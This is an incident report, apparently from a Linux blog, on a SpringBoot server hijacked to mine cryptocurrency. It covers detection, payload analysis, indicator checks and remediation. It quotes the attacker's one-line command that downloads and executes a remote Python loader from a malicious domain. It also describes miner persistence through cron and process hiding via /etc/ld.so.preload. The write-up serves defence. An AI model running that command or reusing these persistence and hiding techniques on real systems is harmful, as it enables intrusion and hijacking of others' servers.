How a SpringBoot Server Was Hijacked for Crypto Mining and What You Can Do
This article chronicles the discovery of a server breach used for cryptocurrency mining, analyzes the malicious Python payload and its system modifications, and provides concrete remediation steps such as system reinstall, non‑root deployment, firewall hardening, and Nginx authentication.
Server Intrusion Mining Process
The author records the detection, analysis, and remediation of a server that was compromised to run a cryptocurrency miner.
Incident Timeline
The author received an Alibaba Cloud SMS and email alert on their phone indicating abnormal server behavior. Running netstat showed an unusual listening port with no associated program name, suggesting a Java RCE and a possible rootkit. Business traffic was quickly migrated to a new instance, the compromised server was powered off, and the intrusion was investigated.
Intrusion Behavior Analysis
The compromised SpringBoot application was shelled: it executed a base64‑encoded command that fetched and ran a remote Python script:
python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()'
The downloaded script performed several malicious actions, including removing security tools, killing processes, creating a .git directory, and downloading a program named kworkers, which is a cryptocurrency miner:
Uninstall server security monitoring tools (e.g., Alibaba Cloud Shield).
Terminate all kworkers processes.
Create a .git directory, download the kworkers binary, and execute it.
Monitoring showed a short CPU spike of about five minutes, indicating the miner ran briefly before being stopped.
Server Residual Traces
After rebooting, the following artifacts were discovered:
Crontab entry: 0 2 * * * /xxx/.git/kworkers (persistence: re‑launches the miner daily at 02:00).
Various files downloaded into the trojan’s home directory, including cert_key.pem and cert.pem.
Extensive logs showing downloads of additional scripts, password harvesting, internal network scanning, and repeated attempts to hide processes.
The hideproc.sh script, which compiles a malicious libc2.28.so shared library and injects it via /etc/ld.so.preload to hide processes from netstat.
Access logs revealing a brute‑force attempt from an IP located in Beijing.
Additional temporary files (.1, .1.sh) were found in /tmp. The malicious domain windowsupdatesupport.org was registered in June and resolves to foreign IPs; the payload was delivered over plain HTTP.
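The residual traces listed above can be checked for in a read‑only way. The following POSIX shell script is an added example (not from the original article); it takes a root directory as a parameter so it can be run against a mounted image of the powered‑off server rather than a live host. The paths and the ROOT parameter are assumptions, not details from the page.

```shell
#!/bin/sh
# Added example: look for the indicators described in the article.
# ROOT (hypothetical parameter) is "/" on a live host or the mount point
# of the compromised server's disk image.

# check_preload ROOT: flag every library listed in /etc/ld.so.preload
# (hideproc.sh wrote a malicious libc2.28.so there to hide processes from netstat).
check_preload() {
    f="$1/etc/ld.so.preload"
    [ -s "$f" ] || return 0
    while IFS= read -r lib; do
        printf 'ld.so.preload entry: %s\n' "$lib"
    done < "$f"
    return 1
}

# check_cron ROOT: flag crontab lines that run a binary from a hidden .git directory
# (the miner persisted as "0 2 * * * /xxx/.git/kworkers").
check_cron() {
    found=0
    for ct in "$1"/var/spool/cron/crontabs/* "$1"/var/spool/cron/* \
              "$1"/etc/crontab "$1"/etc/cron.d/*; do
        [ -f "$ct" ] || continue
        if grep -n '/\.git/' "$ct"; then found=1; fi
    done
    [ "$found" -eq 0 ]
}

# check_tmp ROOT: flag dot‑prefixed dropper files such as /tmp/.1 and /tmp/.1.sh
check_tmp() {
    found=0
    for f in "$1"/tmp/.[0-9]*; do
        [ -e "$f" ] || continue
        printf 'suspicious tmp file: %s\n' "$f"
        found=1
    done
    [ "$found" -eq 0 ]
}

# run_checks ROOT: exit status 0 when no indicator is present, 1 otherwise
run_checks() {
    rc=0
    check_preload "$1" || rc=1
    check_cron "$1" || rc=1
    check_tmp "$1" || rc=1
    return "$rc"
}
```

Run it as `run_checks /mnt/image`; a non‑zero exit means at least one indicator was found and the printed lines say which.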
Remediation Steps
Because the exact vulnerable SpringBoot dependency was not identified, the following mitigations were applied:
Reinstall the operating system on the compromised server.
Run SpringBoot applications under a non‑root user.
Implement basic authentication in Nginx:
apt install -y apache2-utils
htpasswd -c /etc/nginx/conf.d/.htpasswd user   # -c creates the file; omit it when adding further users
server {
...
auth_basic "Subsystem Authentication";
auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
...
}
Restrict outbound connections with firewall rules.
These measures reduce the likelihood of recurrence, though locating and patching the vulnerable library remains a priority.
Conclusion
The breach turned out to be a mining trojan that did not alter server data, thanks to timely alerts from Alibaba Cloud. The incident underscores the importance of avoiding root execution, tightening firewall policies, maintaining security monitoring, and regularly backing up data.
Open Source Linux
Focused on sharing Linux/Unix content, covering fundamentals, system development, network programming, automation/operations, cloud computing, and related professional knowledge.